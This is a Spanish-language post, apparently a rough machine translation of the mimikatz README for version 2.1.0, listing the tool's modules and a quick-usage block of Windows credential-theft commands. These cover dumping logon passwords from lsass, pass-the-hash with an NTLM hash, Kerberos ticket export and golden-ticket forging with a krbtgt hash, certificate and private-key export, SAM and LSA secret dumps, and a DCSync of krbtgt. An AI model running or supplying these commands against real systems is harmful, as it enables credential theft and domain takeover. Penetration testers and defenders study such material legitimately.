El sabor de Win32 no puede acceder a 64 bits de memoria de proceso (como lsass ) pero puede abrir un minivolcado de 32 bits en Windows 64 bits.
Algunas operaciones necesitan privilegios de administrador o token del sistema , así que tenga en cuenta el UAC de la versión de Vista .

Y en conjunto, puede leer las credenciales de la contraseña del sistema de la máquina virtual.
Módulos
estándar
privilegio
crypto
sekurlsa
Kerberos
lsadump
bóveda
simbólico
evento
ts
proceso
Servicio
red
Misc
biblioteca mimilib
driver mimidrv
Uso rápido
privilege::debug
sekurlsa
sekurlsa
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
Kerberos
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
bóveda y lsadump
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
mimikatz 2.1.0 20180527 ha sido lanzado.


0 Comentarios